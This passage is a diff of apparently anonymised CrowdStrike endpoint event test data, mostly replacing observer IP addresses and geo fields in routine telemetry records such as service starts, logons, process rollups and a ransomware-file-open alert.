"{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"402097454\",\"ContextProcessId\":\"66601077523\",\"ContextThreadId\":\"2500785639062\",\"ContextTimeStamp\":\"1604855165.213\",\"DesiredAccess\":\"1048577\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"128\",\"FileIdentifier\":\"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700\",\"FileObject\":\"18446641334185168032\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"35668001\",\"ShareAccess\":\"3\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\CbsTemp\\\\30848497_1904507751\\\\FodWU\",\"aid\":\"ffffffff2c9f4066b0b5f2f00265503c\",\"aip\":\"208.216.128.255\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"DirectoryCreate\",\"id\":\"ffffffff-1111-11eb-9411-06b7c99be087\",\"name\":\"DirectoryCreateV1\",\"timestamp\":\"1604855180332\"}", + "ingested": "2021-12-09T13:36:11.151200Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"402097454\",\"ContextProcessId\":\"66601077523\",\"ContextThreadId\":\"2500785639062\",\"ContextTimeStamp\":\"1604855165.213\",\"DesiredAccess\":\"1048577\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"128\",\"FileIdentifier\":\"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700\",\"FileObject\":\"18446641334185168032\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"35668001\",\"ShareAccess\":\"3\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\CbsTemp\\\\30848497_1904507751\\\\FodWU\",\"aid\":\"ffffffff2c9f4066b0b5f2f00265503c\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"DirectoryCreate\",\"id\":\"ffffffff-1111-11eb-9411-06b7c99be087\",\"name\":\"DirectoryCreateV1\",\"timestamp\":\"1604855180332\"}", "created": "2020-11-08T17:06:20.332Z", "kind": "event", "action": "DirectoryCreate", @@ -8793,21 +7704,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.9.106.189", - "vendor": "crowdstrike", - "ip": "208.9.106.189", "serial_number": "fffffffffcc4413057adc260e99b0774", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:06:36.468Z", "ecs": { @@ -8818,18 +7720,18 @@ "user6" ], "hosts": [ - "208.9.106.189" + "67.43.156.14" ], "hash": [ "3343111420" ], "ip": [ - "208.9.106.189" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466105900Z", - "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k netsvcs -p -s wlidsvc\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextTimeStamp\":\"1604855196.468\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\svchost.exe\",\"InterfaceGuid\":\"367ABB81-9844-35F1-AD32-98F038001003\",\"InterfaceVersion\":\"131072\",\"RpcClientProcessId\":\"949196415400\",\"RpcClientThreadId\":\"44209361549673\",\"RpcNestingLevel\":\"0\",\"RpcOpNum\":\"19\",\"ServiceDisplayName\":\"wlidsvc\",\"TargetProcessId\":\"955370934902\",\"TokenType\":\"1\",\"UserName\":\"user6\",\"aid\":\"fffffffffcc4413057adc260e99b0774\",\"aip\":\"208.9.106.189\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ServiceStarted\",\"id\":\"ffffffff-1111-11eb-9c98-02c501fe7d81\",\"name\":\"ServiceStartedV2\",\"timestamp\":\"1604855196635\"}", + "ingested": "2021-12-09T13:36:11.151206400Z", + "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k netsvcs -p -s wlidsvc\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextTimeStamp\":\"1604855196.468\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\svchost.exe\",\"InterfaceGuid\":\"367ABB81-9844-35F1-AD32-98F038001003\",\"InterfaceVersion\":\"131072\",\"RpcClientProcessId\":\"949196415400\",\"RpcClientThreadId\":\"44209361549673\",\"RpcNestingLevel\":\"0\",\"RpcOpNum\":\"19\",\"ServiceDisplayName\":\"wlidsvc\",\"TargetProcessId\":\"955370934902\",\"TokenType\":\"1\",\"UserName\":\"user6\",\"aid\":\"fffffffffcc4413057adc260e99b0774\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ServiceStarted\",\"id\":\"ffffffff-1111-11eb-9c98-02c501fe7d81\",\"name\":\"ServiceStartedV2\",\"timestamp\":\"1604855196635\"}", "created": "2020-11-08T17:06:36.635Z", "kind": "event", "action": "ServiceStarted", @@ -8890,21 +7792,12 @@ "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.62.90.250", - "vendor": "crowdstrike", - "ip": "208.62.90.250", "serial_number": "ffffffffed0f41575620ab9fb25ce105", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0011104.1" + "version": "1007.4.0011104.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:06:40.751Z", "ecs": { @@ -8912,7 +7805,7 @@ }, "related": { "hosts": [ - "208.62.90.250", + "67.43.156.14", "0:0:0:0:0:0:0:0", "0:0:0:0:0:0:0:1" ], @@ -8920,14 +7813,14 @@ "203564169" ], "ip": [ - "208.62.90.250", + "67.43.156.14", "0:0:0:0:0:0:0:0", "0:0:0:0:0:0:0:1" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466112500Z", - "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"203564169\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"319255017313886870\",\"ContextTimeStamp\":\"1604855200.751\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"LocalPort\":\"0\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemotePort\":\"2181\",\"aid\":\"ffffffffed0f41575620ab9fb25ce105\",\"aip\":\"208.62.90.250\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkConnectIP6\",\"id\":\"ffffffff-1111-11eb-81f1-061cdebbd115\",\"name\":\"NetworkConnectIP6MacV5\",\"timestamp\":\"1604855200836\"}", + "ingested": "2021-12-09T13:36:11.151212800Z", + "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"203564169\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"319255017313886870\",\"ContextTimeStamp\":\"1604855200.751\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"LocalPort\":\"0\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemotePort\":\"2181\",\"aid\":\"ffffffffed0f41575620ab9fb25ce105\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkConnectIP6\",\"id\":\"ffffffff-1111-11eb-81f1-061cdebbd115\",\"name\":\"NetworkConnectIP6MacV5\",\"timestamp\":\"1604855200836\"}", "created": "2020-11-08T17:06:40.836Z", "kind": "event", "action": "NetworkConnectIP6", @@ -8967,21 +7860,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.209", - "vendor": "crowdstrike", - "ip": "208.216.134.209", "serial_number": "ffffffff73164cfa9656c4caff8a2a38", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:06:52.031Z", "ecs": { @@ -8992,19 +7876,19 @@ "user7" ], "hosts": [ - "208.216.134.209", + "67.43.156.13", "srv1" ], "hash": [ "3338885535" ], "ip": [ - "208.216.134.209" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466119300Z", - "original": "{\"AuthenticationId\":\"1656178821\",\"AuthenticationPackage\":\"Kerberos\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"30254389526587\",\"ContextThreadId\":\"275230771323179\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonDomain\":\"dom1\",\"LogonId\":\"1656178821\",\"LogonServer\":\"srv1\",\"LogonTime\":\"1604855211.249\",\"LogonType\":\"5\",\"PasswordLastSet\":\"1530626210.104\",\"RemoteAccount\":\"1\",\"SessionId\":\"0\",\"UserCanonical\":\"\",\"UserFlags\":\"32\",\"UserIsAdmin\":\"0\",\"UserLogonFlags\":\"0\",\"UserName\":\"user7\",\"UserPrincipal\":\"user7@dom4.cm\",\"UserSid\":\"S-1-5-21-606747145-1364589140-725345543-183372\",\"aid\":\"ffffffff73164cfa9656c4caff8a2a38\",\"aip\":\"208.216.134.209\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserIdentity\",\"id\":\"ffffffff-1111-11eb-86e3-02db1faa1327\",\"name\":\"UserIdentityV2\",\"timestamp\":\"1604855212031\"}", + "ingested": "2021-12-09T13:36:11.151219100Z", + "original": "{\"AuthenticationId\":\"1656178821\",\"AuthenticationPackage\":\"Kerberos\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"30254389526587\",\"ContextThreadId\":\"275230771323179\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonDomain\":\"dom1\",\"LogonId\":\"1656178821\",\"LogonServer\":\"srv1\",\"LogonTime\":\"1604855211.249\",\"LogonType\":\"5\",\"PasswordLastSet\":\"1530626210.104\",\"RemoteAccount\":\"1\",\"SessionId\":\"0\",\"UserCanonical\":\"\",\"UserFlags\":\"32\",\"UserIsAdmin\":\"0\",\"UserLogonFlags\":\"0\",\"UserName\":\"user7\",\"UserPrincipal\":\"user7@dom4.cm\",\"UserSid\":\"S-1-5-21-606747145-1364589140-725345543-183372\",\"aid\":\"ffffffff73164cfa9656c4caff8a2a38\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserIdentity\",\"id\":\"ffffffff-1111-11eb-86e3-02db1faa1327\",\"name\":\"UserIdentityV2\",\"timestamp\":\"1604855212031\"}", "created": "2020-11-08T17:06:52.031Z", "kind": "event", "action": "UserIdentity", @@ -9080,24 +7964,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-AL", - "city_name": "Birmingham", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Alabama", - "location": { - "lon": -86.7014, - "lat": 33.6454 - } - }, - "address": "208.65.31.23", - "vendor": "crowdstrike", - "ip": "208.65.31.23", "serial_number": "ffffffffbe8a46386afe80c5ef64d0b5", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0010609.1" + "version": "1007.3.0010609.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:07:17.946Z", "ecs": { @@ -9105,7 +7977,7 @@ }, "related": { "hosts": [ - "208.65.31.23" + "67.43.156.14" ], "hash": [ "8a0a29438052faed8a2532da50455756", @@ -9113,12 +7985,12 @@ "4193986770" ], "ip": [ - "208.65.31.23" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466126Z", - "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"C:\\\\WINDOWS\\\\System32\\\\svchost.exe -k netsvcs -p -s NetSetupSvc\",\"ConfigBuild\":\"1007.3.0010609.1\",\"ConfigStateHash\":\"4193986770\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\svchost.exe\",\"ImageSubsystem\":\"2\",\"IntegrityLevel\":\"16384\",\"MD5HashData\":\"8a0a29438052faed8a2532da50455756\",\"ParentAuthenticationId\":\"999\",\"ParentProcessId\":\"2881931477041\",\"ProcessCreateFlags\":\"525324\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"8193\",\"ProcessStartTime\":\"1604842733.215\",\"ProcessSxsFlags\":\"64\",\"RawProcessId\":\"6160\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6\",\"SessionId\":\"0\",\"SourceProcessId\":\"2881931477041\",\"SourceThreadId\":\"70316664105336\",\"Tags\":\"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297\",\"TargetProcessId\":\"2882232404222\",\"TokenType\":\"2\",\"UserSid\":\"S-1-5-18\",\"WindowFlags\":\"128\",\"aid\":\"ffffffffbe8a46386afe80c5ef64d0b5\",\"aip\":\"208.65.31.23\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-b4f9-06e3a7e5503b\",\"name\":\"ProcessRollup2V16\",\"timestamp\":\"1604855237946\"}", + "ingested": "2021-12-09T13:36:11.151225300Z", + "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"C:\\\\WINDOWS\\\\System32\\\\svchost.exe -k netsvcs -p -s NetSetupSvc\",\"ConfigBuild\":\"1007.3.0010609.1\",\"ConfigStateHash\":\"4193986770\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\svchost.exe\",\"ImageSubsystem\":\"2\",\"IntegrityLevel\":\"16384\",\"MD5HashData\":\"8a0a29438052faed8a2532da50455756\",\"ParentAuthenticationId\":\"999\",\"ParentProcessId\":\"2881931477041\",\"ProcessCreateFlags\":\"525324\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"8193\",\"ProcessStartTime\":\"1604842733.215\",\"ProcessSxsFlags\":\"64\",\"RawProcessId\":\"6160\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6\",\"SessionId\":\"0\",\"SourceProcessId\":\"2881931477041\",\"SourceThreadId\":\"70316664105336\",\"Tags\":\"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297\",\"TargetProcessId\":\"2882232404222\",\"TokenType\":\"2\",\"UserSid\":\"S-1-5-18\",\"WindowFlags\":\"128\",\"aid\":\"ffffffffbe8a46386afe80c5ef64d0b5\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-b4f9-06e3a7e5503b\",\"name\":\"ProcessRollup2V16\",\"timestamp\":\"1604855237946\"}", "created": "2020-11-08T17:07:17.946Z", "kind": "event", "action": "ProcessRollup2", @@ -9188,21 +8060,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.226.182.36", - "vendor": "crowdstrike", - "ip": "208.226.182.36", "serial_number": "ffffffffac4148947ed68497e89f3308", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T09:58:32.519Z", "file": { @@ -9218,18 +8081,18 @@ }, "related": { "hosts": [ - "208.226.182.36" + "67.43.156.14" ], "hash": [ "1763245019" ], "ip": [ - "208.226.182.36" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466132700Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1763245019\",\"ContextProcessId\":\"1016182570608\",\"ContextThreadId\":\"37343520154472\",\"ContextTimeStamp\":\"1604829512.519\",\"DesiredAccess\":\"1179785\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"0\",\"FileIdentifier\":\"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00\",\"FileObject\":\"18446670458156489088\",\"Information\":\"1\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"16777312\",\"ShareAccess\":\"5\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\user11\\\\Downloads\\\\file.pptx\",\"aid\":\"ffffffffac4148947ed68497e89f3308\",\"aip\":\"208.226.182.36\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"RansomwareOpenFile\",\"id\":\"ffffffff-1111-11eb-9756-06fe7f8f682f\",\"name\":\"RansomwareOpenFileV4\",\"timestamp\":\"1604855242091\"}", + "ingested": "2021-12-09T13:36:11.151231700Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1763245019\",\"ContextProcessId\":\"1016182570608\",\"ContextThreadId\":\"37343520154472\",\"ContextTimeStamp\":\"1604829512.519\",\"DesiredAccess\":\"1179785\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"0\",\"FileIdentifier\":\"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00\",\"FileObject\":\"18446670458156489088\",\"Information\":\"1\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"16777312\",\"ShareAccess\":\"5\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\user11\\\\Downloads\\\\file.pptx\",\"aid\":\"ffffffffac4148947ed68497e89f3308\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"RansomwareOpenFile\",\"id\":\"ffffffff-1111-11eb-9756-06fe7f8f682f\",\"name\":\"RansomwareOpenFileV4\",\"timestamp\":\"1604855242091\"}", "created": "2020-11-08T17:07:22.091Z", "kind": "alert", "action": "RansomwareOpenFile", @@ -9287,21 +8150,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.192", - "vendor": "crowdstrike", - "ip": "208.216.134.192", "serial_number": "fffffffffdab492a5a20cd0417395a73", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0010609.1" + "version": "1007.3.0010609.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:07:54.377Z", "ecs": { @@ -9309,19 +8163,19 @@ }, "related": { "hosts": [ - "208.216.134.192" + "67.43.156.13" ], "hash": [ "87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f", "2030177841" ], "ip": [ - "208.216.134.192" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466139400Z", - "original": "{\"AllocateVirtualMemoryCount\":\"0\",\"ArchiveFileWrittenCount\":\"0\",\"AsepWrittenCount\":\"0\",\"BinaryExecutableWrittenCount\":\"0\",\"CLICreationCount\":\"0\",\"ConHostId\":\"13532\",\"ConHostProcessId\":\"1731198143955\",\"ConfigBuild\":\"1007.3.0010609.1\",\"ConfigStateHash\":\"2030177841\",\"ContextData\":\"\",\"ContextProcessId\":\"1741732942772\",\"ContextThreadId\":\"28523520529271\",\"ContextTimeStamp\":\"1604855274.377\",\"CycleTime\":\"473618996\",\"DirectoryCreatedCount\":\"0\",\"DirectoryEnumeratedCount\":\"0\",\"DnsRequestCount\":\"0\",\"DocumentFileWrittenCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ExeAndServiceCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"ExitCode\":\"0\",\"FileDeletedCount\":\"0\",\"GenericFileWrittenCount\":\"0\",\"ImageSubsystem\":\"2\",\"InjectedDllCount\":\"0\",\"InjectedThreadCount\":\"0\",\"KernelTime\":\"1406250\",\"MaxThreadCount\":\"16\",\"ModuleLoadCount\":\"72\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkConnectCountUdp\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkModuleLoadCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"ParentProcessId\":\"1731198143955\",\"PrivilegedProcessHandleCount\":\"0\",\"ProcessStartTime\":\"1604855154.465\",\"ProtectVirtualMemoryCount\":\"0\",\"QueueApcCount\":\"0\",\"RawProcessId\":\"18176\",\"RegKeySecurityDecreasedCount\":\"0\",\"RemovableDiskFileWrittenCount\":\"0\",\"RunDllInvocationCount\":\"0\",\"SHA256HashData\":\"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f\",\"ScreenshotsTakenCount\":\"0\",\"ScriptEngineInvocationCount\":\"0\",\"ServiceEventCount\":\"0\",\"SetThreadContextCount\":\"0\",\"SnapshotFileOpenCount\":\"0\",\"SuspectStackCount\":\"0\",\"SuspiciousCredentialModuleLoadCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"SuspiciousFontLoadCount\":\"0\",\"SuspiciousRawDiskReadCount\":\"0\",\"TargetProcessId\":\"1741732942772\",\"UnsignedModuleLoadCount\":\"0\",\"UserMemoryAllocateExecutableCount\":\"0\",\"UserMemoryAllocateExecutableRemoteCount\":\"0\",\"UserMemoryProtectExecutableCount\":\"0\",\"UserMemoryProtectExecutableRemoteCount\":\"0\",\"UserSid\":\"S-1-12-1-1647509123-1308660782-3901357462-3999411581\",\"UserTime\":\"781250\",\"aid\":\"fffffffffdab492a5a20cd0417395a73\",\"aip\":\"208.216.134.192\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-b685-0241eaddc553\",\"name\":\"EndOfProcessV14\",\"timestamp\":\"1604855276657\"}", + "ingested": "2021-12-09T13:36:11.151237900Z", + "original": "{\"AllocateVirtualMemoryCount\":\"0\",\"ArchiveFileWrittenCount\":\"0\",\"AsepWrittenCount\":\"0\",\"BinaryExecutableWrittenCount\":\"0\",\"CLICreationCount\":\"0\",\"ConHostId\":\"13532\",\"ConHostProcessId\":\"1731198143955\",\"ConfigBuild\":\"1007.3.0010609.1\",\"ConfigStateHash\":\"2030177841\",\"ContextData\":\"\",\"ContextProcessId\":\"1741732942772\",\"ContextThreadId\":\"28523520529271\",\"ContextTimeStamp\":\"1604855274.377\",\"CycleTime\":\"473618996\",\"DirectoryCreatedCount\":\"0\",\"DirectoryEnumeratedCount\":\"0\",\"DnsRequestCount\":\"0\",\"DocumentFileWrittenCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ExeAndServiceCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"ExitCode\":\"0\",\"FileDeletedCount\":\"0\",\"GenericFileWrittenCount\":\"0\",\"ImageSubsystem\":\"2\",\"InjectedDllCount\":\"0\",\"InjectedThreadCount\":\"0\",\"KernelTime\":\"1406250\",\"MaxThreadCount\":\"16\",\"ModuleLoadCount\":\"72\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkConnectCountUdp\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkModuleLoadCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"ParentProcessId\":\"1731198143955\",\"PrivilegedProcessHandleCount\":\"0\",\"ProcessStartTime\":\"1604855154.465\",\"ProtectVirtualMemoryCount\":\"0\",\"QueueApcCount\":\"0\",\"RawProcessId\":\"18176\",\"RegKeySecurityDecreasedCount\":\"0\",\"RemovableDiskFileWrittenCount\":\"0\",\"RunDllInvocationCount\":\"0\",\"SHA256HashData\":\"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f\",\"ScreenshotsTakenCount\":\"0\",\"ScriptEngineInvocationCount\":\"0\",\"ServiceEventCount\":\"0\",\"SetThreadContextCount\":\"0\",\"SnapshotFileOpenCount\":\"0\",\"SuspectStackCount\":\"0\",\"SuspiciousCredentialModuleLoadCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"SuspiciousFontLoadCount\":\"0\",\"SuspiciousRawDiskReadCount\":\"0\",\"TargetProcessId\":\"1741732942772\",\"UnsignedModuleLoadCount\":\"0\",\"UserMemoryAllocateExecutableCount\":\"0\",\"UserMemoryAllocateExecutableRemoteCount\":\"0\",\"UserMemoryProtectExecutableCount\":\"0\",\"UserMemoryProtectExecutableRemoteCount\":\"0\",\"UserSid\":\"S-1-12-1-1647509123-1308660782-3901357462-3999411581\",\"UserTime\":\"781250\",\"aid\":\"fffffffffdab492a5a20cd0417395a73\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-b685-0241eaddc553\",\"name\":\"EndOfProcessV14\",\"timestamp\":\"1604855276657\"}", "created": "2020-11-08T17:07:56.657Z", "kind": "event", "action": "EndOfProcess", @@ -9416,21 +8270,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.214", - "vendor": "crowdstrike", - "ip": "208.216.134.214", "serial_number": "fffffffffa474d216472f3edb73c75ed", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:08:37.892Z", "file": { @@ -9447,18 +8292,18 @@ }, "related": { "hosts": [ - "208.216.134.214" + "67.43.156.13" ], "hash": [ "3338885535" ], "ip": [ - "208.216.134.214" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466146100Z", - "original": "{\"AuthenticationId\":\"895027\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"1786917081743\",\"ContextThreadId\":\"31685015444484\",\"ContextTimeStamp\":\"1604855317.892\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"0000000000000000be341bb58bc5f1f2a24339010200510e\",\"FileObject\":\"18446636933702558240\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"1\",\"IsOnRemovableDisk\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"223989\",\"TargetFileName\":\"\\\\Device\\\\Mup\\\\intranet.dev\\\\int\\\\Test.pptx\",\"TokenType\":\"1\",\"aid\":\"fffffffffa474d216472f3edb73c75ed\",\"aip\":\"208.216.134.214\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"OoxmlFileWritten\",\"id\":\"ffffffff-1111-11eb-9165-067ee18a7975\",\"name\":\"OoxmlFileWrittenV11\",\"timestamp\":\"1604855329571\"}", + "ingested": 